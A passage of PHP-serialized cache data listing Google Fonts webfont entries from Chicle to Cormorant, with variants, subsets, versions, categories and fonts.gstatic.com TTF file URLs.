\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/chicle/v21/lJwG-pw9i2dqU-BDyWKuobYSxw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:260;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Chilanka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"malayalam\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/chilanka/v18/WWXRlj2DZQiMJYaYRrJQI9EAZhTO.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:261;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Chivo\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/chivo/v17/va9F4kzIxd1KFrjDY8Z_uqzGQC_-.ttf\";s:9:\"300italic\";s:72:\"http://fonts.gstatic.com/s/chivo/v17/va9D4kzIxd1KFrBteUp9sKjkRT_-bF0.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/chivo/v17/va9I4kzIxd1KFoBvS-J3kbDP.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/chivo/v17/va9G4kzIxd1KFrBtQeZVlKDPWTY.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/chivo/v17/va9F4kzIxd1KFrjTZMZ_uqzGQC_-.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/chivo/v17/va9D4kzIxd1KFrBteVp6sKjkRT_-bF0.ttf\";s:3:\"900\";s:69:\"http://fonts.gstatic.com/s/chivo/v17/va9F4kzIxd1KFrjrZsZ_uqzGQC_-.ttf\";s:9:\"900italic\";s:72:\"http://fonts.gstatic.com/s/chivo/v17/va9D4kzIxd1KFrBteWJ4sKjkRT_-bF0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:262;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Chonburi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/chonburi/v10/8AtqGs-wOpGRTBq66IWaFr3biAfZ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:263;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Cinzel\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-tbnTYrvDE5ZdqU.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-uTnTYrvDE5ZdqU.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-gjgTYrvDE5ZdqU.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-jHgTYrvDE5ZdqU.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-lbgTYrvDE5ZdqU.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/cinzel/v19/8vIU7ww63mVu7gtR-kwKxNvkNOjw-n_gTYrvDE5ZdqU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:264;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Cinzel Decorative\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaCSScvJGqLYhG8nNt8KPPswUAPnh7URs1LaCyC.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaHSScvJGqLYhG8nNt8KPPswUAPniZoaelDQzCLlQXE.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/cinzeldecorative/v14/daaHSScvJGqLYhG8nNt8KPPswUAPniZQa-lDQzCLlQXE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:265;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Clicker Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/clickerscript/v13/raxkHiKPvt8CMH6ZWP8PdlEq72rY2zqUKafv.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:266;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Coda\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/coda/v21/SLXHc1jY5nQ8JUIMapaN39I.ttf\";s:3:\"800\";s:67:\"http://fonts.gstatic.com/s/coda/v21/SLXIc1jY5nQ8HeIgTp6mw9t1cX8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:267;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Coda Caption\";s:8:\"variants\";a:1:{i:0;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/codacaption/v19/ieVm2YRII2GMY7SyXSoDRiQGqcx6x_-fACIgaw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:268;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Codystar\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/codystar/v15/FwZf7-Q1xVk-40qxOuYsyuyrj0e29bfC.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/codystar/v15/FwZY7-Q1xVk-40qxOt6A4sijpFu_.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:269;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Coiny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/coiny/v16/gyByhwU1K989PXwbElSvO5Tc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:270;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Combo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/combo/v21/BXRlvF3Jh_fIhg0iBu9y8Hf0.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:271;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Comfortaa\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v40\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/comfortaa/v40/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:272;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Comforter\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/comforter/v5/H4clBXOCl8nQnlaql3Qa6JG8iqeuag.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:273;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Comforter Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/comforterbrush/v5/Y4GTYa1xVSggrfzZI5WMjxRaOz0jwLL9Th8YYA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:274;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Comic Neue\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/comicneue/v8/4UaErEJDsxBrF37olUeD_wHLwpteLwtHJlc.ttf\";s:9:\"300italic\";s:82:\"http://fonts.gstatic.com/s/comicneue/v8/4UaarEJDsxBrF37olUeD96_RTplUKylCNlcw_Q.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/comicneue/v8/4UaHrEJDsxBrF37olUeDx63j5pN1MwI.ttf\";s:6:\"italic\";s:78:\"http://fonts.gstatic.com/s/comicneue/v8/4UaFrEJDsxBrF37olUeD96_p4rFwIwJePw.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/comicneue/v8/4UaErEJDsxBrF37olUeD_xHMwpteLwtHJlc.ttf\";s:9:\"700italic\";s:82:\"http://fonts.gstatic.com/s/comicneue/v8/4UaarEJDsxBrF37olUeD96_RXp5UKylCNlcw_Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:275;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Coming Soon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/comingsoon/v19/qWcuB6mzpYL7AJ2VfdQR1u-SUjjzsykh.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:276;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Commissioner\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni-IO9pOXuRoaY.ttf\";s:3:\"200\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi_IO9pOXuRoaY.ttf\";s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ia_IO9pOXuRoaY.ttf\";s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Ni_IO9pOXuRoaY.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Oq_IO9pOXuRoaY.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Aa4IO9pOXuRoaY.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5D-4IO9pOXuRoaY.ttf\";s:3:\"800\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5Fi4IO9pOXuRoaY.ttf\";s:3:\"900\";s:99:\"http://fonts.gstatic.com/s/commissioner/v13/tDbe2o2WnlgI0FNDgduEk4jAhwgIy5k8SlfU5HG4IO9pOXuRoaY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:277;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Concert One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/concertone/v17/VEM1Ro9xs5PjtzCu-srDqRTlhv-CuVAQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:278;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Condiment\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/condiment/v20/pONk1hggFNmwvXALyH6Sq4n4o1vyCQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:279;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Content\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"khmer\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/content/v24/zrfl0HLayePhU_AwUaDyIiL0RCg.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/content/v24/zrfg0HLayePhU_AwaRzdBirfWCHvkAI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:280;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Contrail One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/contrailone/v15/eLGbP-j_JA-kG0_Zo51noafdZUvt_c092w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:281;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Convergence\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/convergence/v15/rax5HiePvdgXPmmMHcIPYRhasU7Q8Cad.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:282;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Cookie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/cookie/v17/syky-y18lb0tSbfNlQCT9tPdpw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:283;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Copse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/copse/v15/11hPGpDKz1rGb0djHkihUb-A.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:284;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Corben\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/corben/v19/LYjDdGzzklQtCMp9oAlEpVs3VQ.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/corben/v19/LYjAdGzzklQtCMpFHCZgrXArXN7HWQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:285;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Corinthia\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/corinthia/v9/wEO_EBrAnchaJyPMHE0FUfAL3EsHiA.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/corinthia/v9/wEO6EBrAnchaJyPMHE097d8v1GAbgbLXQA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:286;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Cormorant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFk9TQ7Rg7A2uwYs.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFhFTQ7Rg7A2uwYs.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFiNTQ7Rg7A2uwYs.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFs9UQ7Rg7A2uwYs.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/cormorant/v18/H4c2BXOCl9bbnla_nHIA47NMUjsNbCVrFvZUQ7Rg7A2uwYs.ttf\";s:9:\"300italic\";s:95:\"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQ9fdq6C-r0YvxdA.ttf\";s:6:\"italic\";s:95:\"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQq_dq6C-r0YvxdA.ttf\";s:9:\"500italic\";s:95:\"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQmfdq6C-r0YvxdA.ttf\";s:9:\"600italic\";s:95:\"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQdfBq6C-r0YvxdA.ttf\";s:9:\"700italic\";s:95:\"http://fonts.gstatic.com/s/cormorant/v18/H4c0BXOCl9bbnla_nHIq6oGzilJm9otsA9kQTPBq6C-r0YvxdA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:287;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Cormorant Garamond\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQAllvuQWJ5heb_w.ttf\";s:9:\"300italic\";s:101:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPjuw-NxBKL_y94.ttf\";s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3bmX5slCNuHLi8bLeY9MK7whWMhyjornFLsS6V7w.ttf\";s:6:\"italic\";s:97:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3ZmX5slCNuHLi8bLeY9MK7whWMhyjYrHtPkyuF7w6C.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQWlhvuQWJ5heb_w.ttf\";s:9:\"500italic\";s:101:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEO7ug-NxBKL_y94.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQdl9vuQWJ5heb_w.ttf\";s:9:\"600italic\";s:101:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEOXvQ-NxBKL_y94.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3YmX5slCNuHLi8bLeY9MK7whWMhyjQEl5vuQWJ5heb_w.ttf\";s:9:\"700italic\";s:101:\"http://fonts.gstatic.com/s/cormorantgaramond/v16/co3WmX5slCNuHLi8bLeY9MK7whWMhyjYrEPzvA-NxBKL_y94.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:288;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Cormorant 